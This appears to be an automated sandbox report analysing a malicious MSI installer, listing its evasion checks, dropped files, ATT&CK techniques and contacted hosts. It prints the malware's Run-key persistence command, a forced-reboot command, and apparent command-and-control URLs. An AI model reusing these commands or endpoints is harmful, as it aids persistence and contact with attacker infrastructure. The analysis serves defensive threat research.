Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI27FE.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI33A8.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI279E.tmpJump to dropped file
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeAPI coverage: 3.4 %
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4368Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exe TID: 5560Thread sleep count: 33 > 30Jump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exe TID: 5560Thread sleep time: -30437127721620741s >= -30000sJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exe TID: 5560Thread sleep time: -600000s >= -30000sJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exe TID: 5560Thread sleep time: -599891s >= -30000sJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exe TID: 1576Thread sleep count: 8137 > 30Jump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exe TID: 1576Thread sleep count: 1702 > 30Jump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exe TID: 2952Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\Users\user\EpIiyF FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\Users\user\EpIiyF\GAaICB FullSizeInformationJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: 11_2_00D80015 FindFirstFileExW,FindNextFileW,FindClose,FindClose,11_2_00D80015
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: 11_2_00D7FF61 FindFirstFileExW,11_2_00D7FF61
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: 11_2_00D62381 VirtualQuery,GetSystemInfo,11_2_00D62381
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeThread delayed: delay time: 599891Jump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: EpIiyF_GAaICB.exe, 0000000B.00000003.2524308004.00000000051ED000.00000004.00000020.00020000.00000000.sdmp, EpIiyF_GAaICB.exe, 0000000B.00000002.4446612421.00000000051C4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll[
Source: 6625d7.msi.1.drBinary or memory string: 01234567890.0.0.0.%dVMware, Inc.VMware Virtual PlatformVMware7,1innotek GmbHVirtualBoxMicrosoft CorporationVirtual MachineVRTUALACRSYSA M IROOT\CIMV2SELECT * FROM Win32_ComputerSystemSELECT * FROM Win32_BIOSManufacturerModelVersionGetting system informationManufacturer [Model [BIOS [IsWow64Processkernel32Software\Microsoft\Windows NT\CurrentVersionSYSTEM\CurrentControlSet\Control\ProductOptionsCurrentMajorVersionNumberCurrentMinorVersionNumberCurrentVersionCurrentBuildNumberReleaseIdCSDVersionProductTypeProductSuiteWinNTServerNTSmall BusinessEnterpriseBackOfficeCommunicationServerTerminal ServerSmall Business(Restricted)EmbeddedNTDataCenterPersonalBladeEmbedded(Restricted)Security ApplianceStorage ServerCompute Server Failed to create IWbemLocator object. Error code: \\Could not connect to WMI provider. Error code: Failed to initialize security. Error code: Could not set proxy blanket. Error code: WQLWMI Query failed: []. Error code:
Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: 11_2_00D269C0 rdtsc 11_2_00D269C0
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: 11_2_00D7C4B6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00D7C4B6
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: 11_2_00D7C4B6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00D7C4B6
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: 11_2_00D62918 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_00D62918
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: 11_2_00D61E74 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00D61E74
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeMemory allocated: page read and write | page guardJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C start /MIN reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v EpIiyFGAaICB /t reg_sz /d "C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exe"Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\shutdown.exe "C:\Windows\SysWOW64\shutdown.exe" /r /f /t 10Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v EpIiyFGAaICB /t reg_sz /d "C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exe"Jump to behavior
Source: EpIiyF_GAaICB.exe, 0000000B.00000002.4447849982.00000000075F2000.00000004.00000800.00020000.00000000.sdmp, EpIiyF_GAaICB.exe, 0000000B.00000002.4447849982.0000000007263000.00000004.00000800.00020000.00000000.sdmp, EpIiyF_GAaICB.exe, 0000000B.00000002.4447849982.00000000075DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: 11_2_00D46280 cpuid 11_2_00D46280
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,11_2_00D7F377
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: GetLocaleInfoW,11_2_00D7B36C
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: EnumSystemLocalesW,11_2_00D7F5C8
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,11_2_00D7F670
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: EnumSystemLocalesW,11_2_00D7F8C3
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: EnumSystemLocalesW,11_2_00D7B8AD
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: GetLocaleInfoW,11_2_00D7F930
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,11_2_00D7FAF7
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: GetLocaleInfoW,11_2_00D7FA50
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: EnumSystemLocalesW,11_2_00D7FA05
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: GetLocaleInfoW,11_2_00D7FBFD
Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Users\user\EpIiyF\GAaICB\EpIiyF.zip VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Users\user\EpIiyF\GAaICB\EpIiyF.zip VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Users\user\EpIiyF\GAaICB\EpIiyF.zip VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Users\user\EpIiyF\GAaICB\EpIiyF.zip VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Users\user\EpIiyF\GAaICB\EpIiyF.zip VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Users\user\EpIiyF\GAaICB\EpIiyF.zip VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Users\user\EpIiyF\GAaICB\EpIiyF.zip VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Users\user\EpIiyF\GAaICB\EpIiyF.zip VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Users\user\EpIiyF\GAaICB\EpIiyF.zip VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Users\user\EpIiyF\GAaICB\EpIiyF.zip VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Users\user\EpIiyF\GAaICB\EpIiyF.zip VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Users\user\EpIiyF\GAaICB\EpIiyF.zip VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Users\user\EpIiyF\GAaICB\EpIiyF.zip VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeQueries volume information: C:\Users\user\EpIiyF\GAaICB\msedge_elf.dll VolumeInformationJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeQueries volume information: C:\Users\user\EpIiyF\GAaICB\msedge_elf.dll VolumeInformationJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: 11_2_00D342C0 _strlen,_strlen,GetLocalTime,GetTickCount,_strlen,11_2_00D342C0
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: 11_2_00D746EC GetTimeZoneInformation,11_2_00D746EC
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: 11_2_00D253D0 GetVersionExW,GetProductInfo,__Init_thread_header,GetNativeSystemInfo,11_2_00D253D0
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire Infrastructure1
Replication Through Removable Media		3
Windows Management Instrumentation		1
DLL Side-Loading		1
DLL Side-Loading		1
Disable or Modify Tools		OS Credential Dumping2
System Time Discovery		Remote Services1
Archive Collected Data		1
Ingress Tool Transfer		Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault AccountsScheduled Task/Job1
Registry Run Keys / Startup Folder		12
Process Injection		1
Deobfuscate/Decode Files or Information		LSASS Memory11
Peripheral Device Discovery		Remote Desktop ProtocolData from Removable Media21
Encrypted Channel		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
Registry Run Keys / Startup Folder		4
Obfuscated Files or Information		Security Account Manager3
File and Directory Discovery		SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
Software Packing		NTDS56
System Information Discovery		Distributed Component Object ModelInput Capture14
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Timestomp		LSA Secrets141
Security Software Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain Credentials2
Process Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
File Deletion		DCSync41
Virtualization/Sandbox Evasion		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
Masquerading		Proc Filesystem1
Application Window Discovery		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
Modify Registry		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron41
Virtualization/Sandbox Evasion		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd12
Process Injection		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1442377 Sample: 2ztvLMT477.msi Startdate: 16/05/2024 Architecture: WINDOWS Score: 76 53 collect.installeranalytics.com 2->53 55 presteservicosaz.pro 2->55 57 3 other IPs or domains 2->57 65 Snort IDS alert for network traffic 2->65 67 Antivirus detection for URL or domain 2->67 69 Multi AV Scanner detection for dropped file 2->69 71 2 other signatures 2->71 10 msiexec.exe 3 23 2->10         started        13 EpIiyF_GAaICB.exe 15 3 2->13         started        16 EpIiyF_GAaICB.exe 1 2->16         started        18 msiexec.exe 2 2->18         started        signatures3 process4 dnsIp5 45 C:\Windows\Installer\MSI88B2.tmp, PE32 10->45 dropped 47 C:\Windows\Installer\MSI3475.tmp, PE32 10->47 dropped 49 C:\Windows\Installer\MSI3445.tmp, PE32 10->49 dropped 51 7 other malicious files 10->51 dropped 20 msiexec.exe 4 73 10->20         started        63 194.180.191.36, 49711, 80 MIVOCLOUDMD unknown 13->63 file6 process7 dnsIp8 59 collect.installeranalytics.com 54.227.134.57, 49710, 80 AMAZON-AESUS United States 20->59 61 presteservicosaz.pro 194.180.191.24, 443, 49704 MIVOCLOUDMD unknown 20->61 37 C:\Users\userpIiyFbehaviorgraphAaICB\senhora.exe, PE32 20->37 dropped 39 C:\Users\userpIiyFbehaviorgraphAaICB\senhor.exe, PE32 20->39 dropped 41 C:\Users\user\...\msedge_elf.dll.exe (copy), PE32 20->41 dropped 43 5 other files (3 malicious) 20->43 dropped 73 Uses shutdown.exe to shutdown or reboot the system 20->73 25 cmd.exe 1 20->25         started        27 shutdown.exe 1 20->27         started        file9 signatures10 process11 process12 29 reg.exe 1 1 25->29         started        31 conhost.exe 25->31         started        33 conhost.exe 27->33         started        process13 35 conhost.exe 29->35         started       

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
2ztvLMT477.msi5%ReversingLabs
2ztvLMT477.msi6%VirustotalBrowse

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\EpIiyF\GAaICB\senhora.exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\shi2829.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\shi2829.tmp0%VirustotalBrowse
C:\Users\user\AppData\Local\Temp\shi2887.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\shi2887.tmp0%VirustotalBrowse
C:\Users\user\EpIiyF\GAaICB\COSMDOKLO.COSMDOKLO.dll0%ReversingLabs
C:\Users\user\EpIiyF\GAaICB\COSMDOKLO.COSMDOKLO.dll0%VirustotalBrowse
C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exe (copy)0%ReversingLabs
C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exe (copy)0%VirustotalBrowse
C:\Users\user\EpIiyF\GAaICB\msedge_elf.dll (copy)11%ReversingLabs
C:\Users\user\EpIiyF\GAaICB\msedge_elf.dll (copy)12%VirustotalBrowse
C:\Users\user\EpIiyF\GAaICB\msedge_elf.dll.exe (copy)11%ReversingLabs
C:\Users\user\EpIiyF\GAaICB\msedge_elf.dll.exe (copy)12%VirustotalBrowse
C:\Users\user\EpIiyF\GAaICB\senhor.exe0%ReversingLabs
C:\Users\user\EpIiyF\GAaICB\senhor.exe0%VirustotalBrowse
C:\Users\user\EpIiyF\GAaICB\senhora.exe11%ReversingLabs
C:\Users\user\EpIiyF\GAaICB\senhora.exe12%VirustotalBrowse
C:\Windows\Installer\MSI270F.tmp0%ReversingLabs
C:\Windows\Installer\MSI270F.tmp0%VirustotalBrowse
C:\Windows\Installer\MSI278D.tmp0%ReversingLabs
C:\Windows\Installer\MSI278D.tmp0%VirustotalBrowse
C:\Windows\Installer\MSI279E.tmp0%ReversingLabs
C:\Windows\Installer\MSI279E.tmp0%VirustotalBrowse
C:\Windows\Installer\MSI27CE.tmp0%ReversingLabs
C:\Windows\Installer\MSI27CE.tmp0%VirustotalBrowse
C:\Windows\Installer\MSI27FE.tmp0%ReversingLabs
C:\Windows\Installer\MSI27FE.tmp0%VirustotalBrowse
C:\Windows\Installer\MSI3378.tmp0%ReversingLabs
C:\Windows\Installer\MSI3378.tmp0%VirustotalBrowse
C:\Windows\Installer\MSI33A8.tmp0%ReversingLabs
C:\Windows\Installer\MSI33A8.tmp0%VirustotalBrowse
C:\Windows\Installer\MSI3445.tmp0%ReversingLabs
C:\Windows\Installer\MSI3445.tmp0%VirustotalBrowse
C:\Windows\Installer\MSI3475.tmp0%ReversingLabs
C:\Windows\Installer\MSI3475.tmp0%VirustotalBrowse
C:\Windows\Installer\MSI88B2.tmp0%ReversingLabs
C:\Windows\Installer\MSI88B2.tmp0%VirustotalBrowse

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
collect.installeranalytics.com0%VirustotalBrowse
fp2e7a.wpc.phicdn.net0%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
https://www.thawte.com/cps0/0%URL Reputationsafe
https://www.thawte.com/repository0W0%URL Reputationsafe
https://www.advancedinstaller.com0%URL Reputationsafe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
http://html4/loose.dtd0%Avira URL Cloudsafe
https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ffDilithium2Dilith0%Avira URL Cloudsafe
https://amxx1515cabreun23.asxo0%Avira URL Cloudsafe
http://194.180.191.36/V77lpd/index.php?VS=V7&PL=NAO0%Avira URL Cloudsafe
http://collect.installeranalytics.com/0%Avira URL Cloudsafe
http://194.180.191.360%Avira URL Cloudsafe
https://amxx1515cabreun23.asxo/0%Avira URL Cloudsafe
http://collect.installeranalytics.com/0%VirustotalBrowse
http://194.180.191.36/V77lpd/index.php?VS=V7&PL=NAO1%VirustotalBrowse
https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ffDilithium2Dilith0%VirustotalBrowse
http://collect.installeranalytics.com0%Avira URL Cloudsafe
http://.css0%Avira URL Cloudsafe
https://presteservicosaz.pro/v7icosaza/rain.png100%Avira URL Cloudmalware
http://194.180.191.362%VirustotalBrowse
http://collect.installeranalytics.com0%VirustotalBrowse
http://194.180.191.36/V77lpd/index.php0%Avira URL Cloudsafe
http://.jpg0%Avira URL Cloudsafe
http://194.180.191.36/V77lpd/index.phpLR0%Avira URL Cloudsafe
https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ff0%Avira URL Cloudsafe
https://collect.installeranalytics.com0%Avira URL Cloudsafe
https://collect.installeranalytics.comhttp://collect.installeranalytics.comhttps://installeranalytic0%Avira URL Cloudsafe
http://194.180.191.36/V77lpd/index.phpLR1%VirustotalBrowse
https://presteservicosaz.pro/v7icosaza/rain.png2%VirustotalBrowse
https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ff0%VirustotalBrowse
https://collect.installeranalytics.com0%VirustotalBrowse

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
collect.installeranalytics.com
54.227.134.57
truetrueunknown
presteservicosaz.pro
194.180.191.24
truefalse
    		unknown
    fp2e7a.wpc.phicdn.net
    		192.229.211.108
    		truefalseunknown
    amxx1515cabreun23.asxo
    		unknown
    		unknownfalse
      		unknown

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://collect.installeranalytics.com/true
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      		unknown
      http://194.180.191.36/V77lpd/index.php?VS=V7&PL=NAOfalse
      • 1%, Virustotal, Browse
      • Avira URL Cloud: safe
      		unknown
      https://presteservicosaz.pro/v7icosaza/rain.pngfalse
      • 2%, Virustotal, Browse
      • Avira URL Cloud: malware
      		unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      http://html4/loose.dtdshi2829.tmp.3.drfalse
      • Avira URL Cloud: safe
      		unknown
      https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ffDilithium2DilithEpIiyF_GAaICB.exe, 0000000B.00000000.2318946054.0000000000D9D000.00000002.00000001.01000000.00000004.sdmp, EpIiyF_GAaICB.exe, 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmp, EpIiyF_GAaICB.exe, 0000000C.00000002.2404884425.0000000000D9D000.00000002.00000001.01000000.00000004.sdmp, EpIiyF_GAaICB.exe, 0000000C.00000000.2401484094.0000000000D9D000.00000002.00000001.01000000.00000004.sdmp, senhor.exe.3.drfalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      		unknown
      https://amxx1515cabreun23.asxoEpIiyF_GAaICB.exe, 0000000B.00000002.4447849982.0000000007250000.00000004.00000800.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      https://www.thawte.com/cps0/2ztvLMT477.msi, MSI27FE.tmp.1.dr, MSI88B2.tmp.1.dr, 6625d7.msi.1.dr, MSI3445.tmp.1.dr, MSI27CE.tmp.1.dr, MSI279E.tmp.1.dr, MSI270F.tmp.1.dr, MSI3475.tmp.1.dr, MSI3378.tmp.1.dr, MSI278D.tmp.1.dr, MSI33A8.tmp.1.drfalse
      • URL Reputation: safe
      		unknown
      https://www.thawte.com/repository0W2ztvLMT477.msi, MSI27FE.tmp.1.dr, MSI88B2.tmp.1.dr, 6625d7.msi.1.dr, MSI3445.tmp.1.dr, MSI27CE.tmp.1.dr, MSI279E.tmp.1.dr, MSI270F.tmp.1.dr, MSI3475.tmp.1.dr, MSI3378.tmp.1.dr, MSI278D.tmp.1.dr, MSI33A8.tmp.1.drfalse
      • URL Reputation: safe
      		unknown
      http://194.180.191.36EpIiyF_GAaICB.exe, 0000000B.00000002.4447849982.000000000723A000.00000004.00000800.00020000.00000000.sdmpfalse
      • 2%, Virustotal, Browse
      • Avira URL Cloud: safe
      		unknown
      https://www.advancedinstaller.com2ztvLMT477.msi, MSI27FE.tmp.1.dr, MSI88B2.tmp.1.dr, 6625d7.msi.1.dr, MSI3445.tmp.1.dr, MSI27CE.tmp.1.dr, MSI279E.tmp.1.dr, MSI270F.tmp.1.dr, MSI3475.tmp.1.dr, MSI3378.tmp.1.dr, MSI278D.tmp.1.dr, MSI33A8.tmp.1.drfalse
      • URL Reputation: safe
      		unknown
      https://amxx1515cabreun23.asxo/EpIiyF_GAaICB.exe, 0000000B.00000002.4447849982.0000000007250000.00000004.00000800.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      http://collect.installeranalytics.com2ztvLMT477.msi, MSI88B2.tmp.1.dr, 6625d7.msi.1.dr, MSI270F.tmp.1.dr, MSI3475.tmp.1.dr, MSI3378.tmp.1.dr, MSI33A8.tmp.1.drfalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      		unknown
      http://.cssshi2829.tmp.3.drfalse
      • Avira URL Cloud: safe
      		unknown
      http://194.180.191.36/V77lpd/index.phpEpIiyF_GAaICB.exe, 0000000B.00000002.4447849982.0000000007140000.00000004.00000800.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameEpIiyF_GAaICB.exe, 0000000B.00000002.4447849982.0000000007121000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      http://.jpgshi2829.tmp.3.drfalse
      • Avira URL Cloud: safe
      		unknown
      http://194.180.191.36/V77lpd/index.phpLREpIiyF_GAaICB.exe, 0000000B.00000002.4447849982.0000000007140000.00000004.00000800.00020000.00000000.sdmpfalse
      • 1%, Virustotal, Browse
      • Avira URL Cloud: safe
